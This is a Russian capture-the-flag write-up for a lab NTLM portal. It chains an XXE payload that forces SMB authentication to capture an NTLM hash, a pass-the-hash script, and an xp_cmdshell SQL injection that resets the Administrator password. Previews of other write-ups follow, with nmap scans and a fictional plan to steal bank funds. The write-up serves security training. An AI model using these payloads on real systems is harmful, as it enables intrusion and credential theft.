# DMZ NTLM(10.10.10.30) ## Описание Здесь расположен корпоративный портал управления сотрудниками. Нам нужно получить как можно больше информации о сотрудниках, поэтому попробуй получить доступ к системе. Кстати, забыл сказать, у нас есть мощная машина для брутфорса хешей. ## Краткое описание уязвимостей Доступны функции для загрузки XML-документов. XXE &rarr; SSRF2SMB PassTheHash для прохождения веб-аутентификации с помощью NTLM-хеша. SQL-инъекция в параметрах поиска. Включенный `xp_cmdshell`. # Решение ## Исследование сервера На корневом URL имеется NTLM-аутентификация. ![NTLM-Web](https://i.imgur.com/R94TXNM.png) Перебором директорий можно найти `/documnent`, где имеется форма для загрузки XML-документа. ![XML Form](https://i.imgur.com/eFyCq45.png) Загрузка XML-документа с XXE на внешний ресурс вызывает HTTP-запрос. ![XML File](https://i.imgur.com/plfR5va.png) ![OOB](https://i.imgur.com/HiPGszd.png) ## Подготовка эксплоита и исполнение Загрузим полезную нагрузку в XML-файле с возможностью открытия файла по SMB и запустим Responder с `Challenge=1122334455667788` для получения NTLMv1. ```xml <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo (ANY)> <!ENTITY xxe SYSTEM "file:////<host>/test">]><foo>&xxe;</foo> ``` ![Responder](https://i.imgur.com/uhFVE0U.png) Данный хеш необходимо отправить боту и получить MD4 hex-строку от него: `4b1e3ce3b920636efb5b18c7589bbef9` Полученный хеш нужно использовать на странице с NTLM-аутентификацией для атаки Pass The Hash. Пример Python-скрипта для создания NEGOTIATE-сообщений с использованием библиотеки [pyspnego](https://pypi.org/project/pyspnego/). ```Python import spnego import base64 client = spnego.client('Administrator', '4b1e3ce3b920636efb5b18c7589bbef9:4b1e3ce3b920636efb5b18c7589bbef9', protocol='ntlm') negotiate = client.step() print(base64.b64encode(negotiate).decode()) challenge = base64.b64decode(input("NTLM=")) authenticate = client.step(challenge) print(base64.b64encode(authenticate).decode()) ``` Подставим первое сообщение из скрипта в GET-запрос и скопируем полученный ответ от сервера. ![Negotiate](https://i.imgur.com/tzGgCFc.png) ![Script Result](https://i.imgur.com/lL0O3Yv.png) Полученную строку необходимо вставить в третье сообщение. ![Negotiate Last](https://i.imgur.com/vGpUFMq.png) Таким образом, получен доступ к новой панели с формой поиска сотрудников. ![HR Panel](https://i.imgur.com/xtIChWN.png) Введем в форму следующую полезную нагрузку для SQLi и выполнения CMD-команды для смены пароля у пользователя `Administrator` : `'; EXEC xp_cmdshell 'net user Administrator 1qaz@WSX' -- ` После чего можно выполнить вход по RDP и прочитать содержимое файла `C:\flag.txt` ![RDP Access](https://i.imgur.com/BmTLdL4.png)
Last changed by  
BSC
Bank Security Challenge - Cyber Security Competition
287

Read more

Transaction Zone

Описание У нас мало времени. В банке начали что-то подозревать, поэтому, как получишь доступ к какой-то машине, присылай нам ip-адрес. Наша команда OSINT нашла исходный код от какого-то продукта банка, может быть тебе пригодится. Исходный код расположен по ссылке. Содержимое файла TransactionPool.java package ru.bank.currency; import freemarker.template.Configuration; import freemarker.template.Template; import freemarker.template.TemplateException;

10/3/2022
SPB Department

Enumeration Сканируем сеть и ищем рабочие хосты: nmap -sn --min-parallelism 300 --min-rate 200 10.10.0.0/16 Видим, что имеется один сервер без домена, а также 2 домена test.spb и bank.spb. Скорее всего, тестовый домен защищен в меньшей степени и как-то связан с основным доменом. Также находим СУБД MSSQL на узле SQLTEST. SQLTEST (10.10.2.205) На узле имеется СУБД MSSQL, проверим на стойкость пароль учетной записи "sa".

10/3/2022
MSK Department

Enumeration Сканируем сеть и ищем рабочие хосты: nmap -sn --min-parallelism 300 --min-rate 200 10.10.0.0/16 Server Front (10.10.1.100) В результате сканирования замечаем подозрительный HTTP-порт 80/tcp на узле 10.10.1.100. На данном узле обнаруживается кастомный сервис для хранения файлов. Поле, принимающее путь в сети интернет до файла, уязвимо для SSRF.

10/2/2022
DMZ DBO(10.10.10.25)

Описание А это их сервер ДБО для юридических лиц. Мы точно знаем, что где-то в приложении есть "скрытая" панель для администрирования системы. Попробуй ее найти и получить к ней доступ. Если там ты сможешь найти каких-нибудь клиентов банка, мы сможем вывести их деньги. Присылай, что найдешь. Краткое описание уязвимостей Панель администрирования обнаруживается по угадываемому URL. Используется массовое присвоение параметров модели пользователя через изменение Content-Type. Пароли от учетных записей хранятся в открытом виде. Решение Исследование сервера

9/30/2022
Read more from BSC
Published on HackMD